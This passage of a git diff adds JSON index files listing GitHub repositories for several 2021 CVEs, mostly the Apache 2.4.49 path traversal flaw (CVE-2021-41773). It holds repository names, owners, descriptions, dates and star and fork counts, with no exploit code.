+ "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41651.json b/2021/CVE-2021-41651.json new file mode 100644 index 0000000000..af1829cce8 --- /dev/null +++ b/2021/CVE-2021-41651.json @@ -0,0 +1,33 @@ +[ + { + "id": 411722444, + "name": "CVE-2021-41651", + "full_name": "MobiusBinary\/CVE-2021-41651", + "owner": { + "login": "MobiusBinary", + "id": 91082958, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91082958?v=4", + "html_url": "https:\/\/github.com\/MobiusBinary", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MobiusBinary\/CVE-2021-41651", + "description": null, + "fork": false, + "created_at": "2021-09-29T15:09:43Z", + "updated_at": "2021-10-01T16:29:06Z", + "pushed_at": "2021-10-01T16:27:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41653.json b/2021/CVE-2021-41653.json new file mode 100644 index 0000000000..5a39515976 --- /dev/null +++ b/2021/CVE-2021-41653.json @@ -0,0 +1,33 @@ +[ + { + "id": 432931914, + "name": "CVE-2021-41653", + "full_name": "likeww\/CVE-2021-41653", + "owner": { + "login": "likeww", + "id": 51168412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51168412?v=4", + "html_url": "https:\/\/github.com\/likeww", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likeww\/CVE-2021-41653", + "description": "TP-Link TL-WR840N EU v5 Remote Code Execution", + "fork": false, + "created_at": "2021-11-29T06:39:43Z", + "updated_at": "2023-11-18T03:11:04Z", + "pushed_at": "2021-11-28T01:16:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41703.json b/2021/CVE-2021-41703.json new file mode 100644 index 0000000000..476ff1683d --- /dev/null +++ b/2021/CVE-2021-41703.json @@ -0,0 +1,33 @@ +[ + { + "id": 743697916, + "name": "CVE-2021-41703", + "full_name": "Yanoro\/CVE-2021-41703", + "owner": { + "login": "Yanoro", + "id": 50038395, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50038395?v=4", + "html_url": "https:\/\/github.com\/Yanoro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yanoro\/CVE-2021-41703", + "description": null, + "fork": false, + "created_at": "2024-01-15T19:43:48Z", + "updated_at": "2024-11-23T22:59:43Z", + "pushed_at": "2024-01-24T18:18:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41730.json b/2021/CVE-2021-41730.json new file mode 100644 index 0000000000..bd9dacef93 --- /dev/null +++ b/2021/CVE-2021-41730.json @@ -0,0 +1,33 @@ +[ + { + "id": 440172397, + "name": "CVE-2021-41730", + "full_name": "yezeting\/CVE-2021-41730", + "owner": { + "login": "yezeting", + "id": 67456948, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67456948?v=4", + "html_url": "https:\/\/github.com\/yezeting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yezeting\/CVE-2021-41730", + "description": null, + "fork": false, + "created_at": "2021-12-20T13:03:19Z", + "updated_at": "2021-12-20T13:03:22Z", + "pushed_at": "2021-12-20T11:12:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-41773.json b/2021/CVE-2021-41773.json new file mode 100644 index 0000000000..9136f63ced --- /dev/null +++ b/2021/CVE-2021-41773.json @@ -0,0 +1,3751 @@ +[ + { + "id": 413890827, + "name": "cve-2021-41773", + "full_name": "Vulnmachines\/cve-2021-41773", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/cve-2021-41773", + "description": "CVE-2021-41773 Path Traversal vulnerability in Apache 2.4.49.", + "fork": false, + "created_at": "2021-10-05T16:13:38Z", + "updated_at": "2024-09-03T02:15:12Z", + "pushed_at": "2022-08-30T11:58:32Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 40, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 413892415, + "name": "CVE-2021-41773", + "full_name": "numanturle\/CVE-2021-41773", + "owner": { + "login": "numanturle", + "id": 7007951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7007951?v=4", + "html_url": "https:\/\/github.com\/numanturle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/numanturle\/CVE-2021-41773", + "description": "CVE-2021-41773", + "fork": false, + "created_at": "2021-10-05T16:18:09Z", + "updated_at": "2024-08-12T20:16:59Z", + "pushed_at": "2021-10-05T16:48:27Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 413901787, + "name": "CVE-2021-41773", + "full_name": "knqyf263\/CVE-2021-41773", + "owner": { + "login": "knqyf263", + "id": 2253692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4", + "html_url": "https:\/\/github.com\/knqyf263", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/knqyf263\/CVE-2021-41773", + "description": "Path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773) ", + "fork": false, + "created_at": "2021-10-05T16:45:41Z", + "updated_at": "2024-08-12T20:16:59Z", + "pushed_at": "2021-10-06T05:40:34Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 10, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 413916578, + "name": "CVE-2021-41773-PoC", + "full_name": "ZephrFish\/CVE-2021-41773-PoC", + "owner": { + "login": "ZephrFish", + "id": 5783068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4", + "html_url": "https:\/\/github.com\/ZephrFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZephrFish\/CVE-2021-41773-PoC", + "description": null, + "fork": false, + "created_at": "2021-10-05T17:29:49Z", + "updated_at": "2024-08-12T20:16:59Z", + "pushed_at": "2021-10-06T09:25:38Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 17, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 413916846, + "name": "PoC-CVE-2021-41773", + "full_name": "iilegacyyii\/PoC-CVE-2021-41773", + "owner": { + "login": "iilegacyyii", + "id": 68760809, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68760809?v=4", + "html_url": "https:\/\/github.com\/iilegacyyii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iilegacyyii\/PoC-CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2021-10-05T17:30:43Z", + "updated_at": "2024-08-12T20:16:59Z", + "pushed_at": "2021-11-24T12:57:46Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "cve", + "lfi", + "poc", + "rce" + ], + "visibility": "public", + "forks": 38, + "watchers": 47, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 413943505, + "name": "CVE-2021-41773", + "full_name": "masahiro331\/CVE-2021-41773", + "owner": { + "login": "masahiro331", + "id": 20438853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20438853?v=4", + "html_url": "https:\/\/github.com\/masahiro331", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/masahiro331\/CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2021-10-05T18:56:04Z", + "updated_at": "2024-08-12T20:16:59Z", + "pushed_at": "2021-10-06T03:43:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 413969845, + "name": "CVE-2021-41773", + "full_name": "j4k0m\/CVE-2021-41773", + "owner": { + "login": "j4k0m", + "id": 48088579, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48088579?v=4", + "html_url": "https:\/\/github.com\/j4k0m", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j4k0m\/CVE-2021-41773", + "description": "Exploitation of CVE-2021-41773 a Directory Traversal in Apache 2.4.49.", + "fork": false, + "created_at": "2021-10-05T20:30:01Z", + "updated_at": "2024-08-12T20:17:00Z", + "pushed_at": "2021-10-05T22:06:50Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 413972926, + "name": "POC-CVE-2021-41773", + "full_name": "TishcaTpx\/POC-CVE-2021-41773", + "owner": { + "login": "TishcaTpx", + "id": 91351013, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91351013?v=4", + "html_url": "https:\/\/github.com\/TishcaTpx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TishcaTpx\/POC-CVE-2021-41773", + "description": "Poc.py ", + "fork": false, + "created_at": "2021-10-05T20:41:34Z", + "updated_at": "2024-08-12T20:17:00Z", + "pushed_at": "2021-10-05T21:29:59Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 414013246, + "name": "CVE-2021-41773-PoC", + "full_name": "lorddemon\/CVE-2021-41773-PoC", + "owner": { + "login": "lorddemon", + "id": 6675738, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6675738?v=4", + "html_url": "https:\/\/github.com\/lorddemon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lorddemon\/CVE-2021-41773-PoC", + "description": null, + "fork": false, + "created_at": "2021-10-05T23:53:48Z", + "updated_at": "2024-10-29T01:57:23Z", + "pushed_at": "2021-10-06T15:37:23Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 37, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414043746, + "name": "CVE-2021-41773_CVE-2021-42013", + "full_name": "Ls4ss\/CVE-2021-41773_CVE-2021-42013", + "owner": { + "login": "Ls4ss", + "id": 25537761, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25537761?v=4", + "html_url": "https:\/\/github.com\/Ls4ss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ls4ss\/CVE-2021-41773_CVE-2021-42013", + "description": "Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE", + "fork": false, + "created_at": "2021-10-06T02:28:41Z", + "updated_at": "2024-08-12T20:17:00Z", + "pushed_at": "2022-09-09T16:09:11Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "cve", + "exploit", + "payload", + "pentest", + "rce" + ], + "visibility": "public", + "forks": 9, + "watchers": 21, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 414044140, + "name": "CVE-2021-41773", + "full_name": "itsecurityco\/CVE-2021-41773", + "owner": { + "login": "itsecurityco", + "id": 1725054, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1725054?v=4", + "html_url": "https:\/\/github.com\/itsecurityco", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/itsecurityco\/CVE-2021-41773", + "description": "CVE-2021-41773 POC with Docker", + "fork": false, + "created_at": "2021-10-06T02:30:40Z", + "updated_at": "2024-08-12T20:17:00Z", + "pushed_at": "2022-10-07T23:37:10Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 414050354, + "name": "CVE-2021-41773-PoC", + "full_name": "habibiefaried\/CVE-2021-41773-PoC", + "owner": { + "login": "habibiefaried", + "id": 4345690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4345690?v=4", + "html_url": "https:\/\/github.com\/habibiefaried", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/habibiefaried\/CVE-2021-41773-PoC", + "description": "PoC for CVE-2021-41773 with docker to demonstrate", + "fork": false, + "created_at": "2021-10-06T03:01:41Z", + "updated_at": "2024-08-12T20:17:00Z", + "pushed_at": "2021-10-06T05:39:24Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 414082287, + "name": "CVE-2021-41773-POC", + "full_name": "creadpag\/CVE-2021-41773-POC", + "owner": { + "login": "creadpag", + "id": 15526083, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15526083?v=4", + "html_url": "https:\/\/github.com\/creadpag", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/creadpag\/CVE-2021-41773-POC", + "description": "CVE-2021-41773", + "fork": false, + "created_at": "2021-10-06T05:34:48Z", + "updated_at": "2024-08-12T20:17:00Z", + "pushed_at": "2022-12-28T17:49:24Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 414082633, + "name": "cve-2021-41773-nse", + "full_name": "TAI-REx\/cve-2021-41773-nse", + "owner": { + "login": "TAI-REx", + "id": 78527947, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78527947?v=4", + "html_url": "https:\/\/github.com\/TAI-REx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TAI-REx\/cve-2021-41773-nse", + "description": "CVE-2021-41773.nse", + "fork": false, + "created_at": "2021-10-06T05:36:22Z", + "updated_at": "2021-11-26T18:07:10Z", + "pushed_at": "2021-10-06T05:23:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 414108838, + "name": "CVE-2021-41773", + "full_name": "blasty\/CVE-2021-41773", + "owner": { + "login": "blasty", + "id": 101374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101374?v=4", + "html_url": "https:\/\/github.com\/blasty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blasty\/CVE-2021-41773", + "description": "CVE-2021-41773 playground", + "fork": false, + "created_at": "2021-10-06T07:17:05Z", + "updated_at": "2024-11-22T13:23:13Z", + "pushed_at": "2021-10-07T17:56:38Z", + "stargazers_count": 206, + "watchers_count": 206, + "has_discussions": false, + "forks_count": 46, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 46, + "watchers": 206, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 414159388, + "name": "CVE-2021-41773", + "full_name": "PentesterGuruji\/CVE-2021-41773", + "owner": { + "login": "PentesterGuruji", + "id": 87645282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87645282?v=4", + "html_url": "https:\/\/github.com\/PentesterGuruji", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PentesterGuruji\/CVE-2021-41773", + "description": "Path Traversal vulnerability in Apache 2.4.49", + "fork": false, + "created_at": "2021-10-06T10:04:22Z", + "updated_at": "2024-08-12T20:17:01Z", + "pushed_at": "2021-10-07T19:39:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414227353, + "name": "CVE-2021-41773", + "full_name": "jbovet\/CVE-2021-41773", + "owner": { + "login": "jbovet", + "id": 41589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41589?v=4", + "html_url": "https:\/\/github.com\/jbovet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jbovet\/CVE-2021-41773", + "description": "Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)", + "fork": false, + "created_at": "2021-10-06T13:39:57Z", + "updated_at": "2024-08-12T20:17:01Z", + "pushed_at": "2021-10-06T14:15:45Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 414239384, + "name": "cve-2021-41773", + "full_name": "mohwahyudi\/cve-2021-41773", + "owner": { + "login": "mohwahyudi", + "id": 57562836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57562836?v=4", + "html_url": "https:\/\/github.com\/mohwahyudi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mohwahyudi\/cve-2021-41773", + "description": null, + "fork": false, + "created_at": "2021-10-06T14:12:07Z", + "updated_at": "2024-08-12T20:17:01Z", + "pushed_at": "2021-10-08T01:55:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414241382, + "name": "CVE-2021-41773", + "full_name": "1nhann\/CVE-2021-41773", + "owner": { + "login": "1nhann", + "id": 76624149, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76624149?v=4", + "html_url": "https:\/\/github.com\/1nhann", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1nhann\/CVE-2021-41773", + "description": "CVE-2021-41773 的复现", + "fork": false, + "created_at": "2021-10-06T14:17:31Z", + "updated_at": "2024-08-12T20:17:01Z", + "pushed_at": "2021-10-08T05:03:10Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414248192, + "name": "CVE-2021-41773", + "full_name": "ranggaggngntt\/CVE-2021-41773", + "owner": { + "login": "ranggaggngntt", + "id": 57105391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57105391?v=4", + "html_url": "https:\/\/github.com\/ranggaggngntt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ranggaggngntt\/CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2021-10-06T14:36:05Z", + "updated_at": "2024-08-12T20:17:01Z", + "pushed_at": "2022-06-11T13:34:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414252359, + "name": "CVE-2021-41773", + "full_name": "BlueTeamSteve\/CVE-2021-41773", + "owner": { + "login": "BlueTeamSteve", + "id": 550582, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/550582?v=4", + "html_url": "https:\/\/github.com\/BlueTeamSteve", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BlueTeamSteve\/CVE-2021-41773", + "description": "Vulnerable docker images for CVE-2021-41773", + "fork": false, + "created_at": "2021-10-06T14:47:23Z", + "updated_at": "2024-08-12T20:17:01Z", + "pushed_at": "2021-10-06T15:07:48Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414256797, + "name": "apache_normalize_path", + "full_name": "Zeop-CyberSec\/apache_normalize_path", + "owner": { + "login": "Zeop-CyberSec", + "id": 68154603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68154603?v=4", + "html_url": "https:\/\/github.com\/Zeop-CyberSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zeop-CyberSec\/apache_normalize_path", + "description": "Metasploit-Framework modules (scanner and exploit) for the CVE-2021-41773 and CVE-2021-42013 (Path Traversal in Apache 2.4.49\/2.4.50)", + "fork": false, + "created_at": "2021-10-06T14:58:27Z", + "updated_at": "2024-08-12T20:17:01Z", + "pushed_at": "2021-10-21T18:51:00Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 414284449, + "name": "CVE-2021-41773", + "full_name": "r00tVen0m\/CVE-2021-41773", + "owner": { + "login": "r00tVen0m", + "id": 50659263, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50659263?v=4", + "html_url": "https:\/\/github.com\/r00tVen0m", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r00tVen0m\/CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2021-10-06T16:15:21Z", + "updated_at": "2024-08-12T20:17:02Z", + "pushed_at": "2021-10-06T19:05:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414347675, + "name": "CVE-2021-41773", + "full_name": "n3k00n3\/CVE-2021-41773", + "owner": { + "login": "n3k00n3", + "id": 7244777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7244777?v=4", + "html_url": "https:\/\/github.com\/n3k00n3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3k00n3\/CVE-2021-41773", + "description": "exploit to CVE-2021-41773", + "fork": false, + "created_at": "2021-10-06T19:39:25Z", + "updated_at": "2024-08-12T20:17:02Z", + "pushed_at": "2021-10-08T16:32:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414350527, + "name": "CVE-2021-41773-RCE", + "full_name": "fnatalucci\/CVE-2021-41773-RCE", + "owner": { + "login": "fnatalucci", + "id": 5574371, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5574371?v=4", + "html_url": "https:\/\/github.com\/fnatalucci", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fnatalucci\/CVE-2021-41773-RCE", + "description": null, + "fork": false, + "created_at": "2021-10-06T19:50:33Z", + "updated_at": "2024-08-12T20:17:02Z", + "pushed_at": "2021-10-06T20:14:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414376599, + "name": "CVE-2021-41773", + "full_name": "AssassinUKG\/CVE-2021-41773", + "owner": { + "login": "AssassinUKG", + "id": 5285547, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5285547?v=4", + "html_url": "https:\/\/github.com\/AssassinUKG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AssassinUKG\/CVE-2021-41773", + "description": "Apache 2.4.49", + "fork": false, + "created_at": "2021-10-06T21:37:18Z", + "updated_at": "2024-08-12T20:17:02Z", + "pushed_at": "2021-10-20T23:04:06Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 414402542, + "name": "Simple-CVE-2021-41773-checker", + "full_name": "jheeree\/Simple-CVE-2021-41773-checker", + "owner": { + "login": "jheeree", + "id": 19227591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19227591?v=4", + "html_url": "https:\/\/github.com\/jheeree", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jheeree\/Simple-CVE-2021-41773-checker", + "description": "Simple script realizado en bash, para revisión de múltiples hosts para CVE-2021-41773 (Apache)", + "fork": false, + "created_at": "2021-10-06T23:32:30Z", + "updated_at": "2024-08-12T20:17:03Z", + "pushed_at": "2021-10-12T03:28:51Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 414410579, + "name": "CVE-2021-41773", + "full_name": "orangmuda\/CVE-2021-41773", + "owner": { + "login": "orangmuda", + "id": 91846073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4", + "html_url": "https:\/\/github.com\/orangmuda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/orangmuda\/CVE-2021-41773", + "description": "Apache HTTPd (2.4.49) – Local File Disclosure (LFI)", + "fork": false, + "created_at": "2021-10-07T00:14:40Z", + "updated_at": "2024-08-12T20:17:03Z", + "pushed_at": "2021-10-07T00:19:26Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "httpd", + "remote-code-execution" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 414425270, + "name": "scarce-apache2", + "full_name": "HightechSec\/scarce-apache2", + "owner": { + "login": "HightechSec", + "id": 24645706, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24645706?v=4", + "html_url": "https:\/\/github.com\/HightechSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HightechSec\/scarce-apache2", + "description": "A framework for bug hunting or pentesting targeting websites that have CVE-2021-41773 Vulnerability in public ", + "fork": false, + "created_at": "2021-10-07T01:31:13Z", + "updated_at": "2024-09-16T03:44:54Z", + "pushed_at": "2021-10-07T08:25:26Z", + "stargazers_count": 62, + "watchers_count": 62, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bash-script", + "bug-hunting", + "cve-2021-41773", + "hacktoberfest", + "pentesting" + ], + "visibility": "public", + "forks": 18, + "watchers": 62, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 414514606, + "name": "CVE-2021-41773-exploit", + "full_name": "vinhjaxt\/CVE-2021-41773-exploit", + "owner": { + "login": "vinhjaxt", + "id": 8877695, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8877695?v=4", + "html_url": 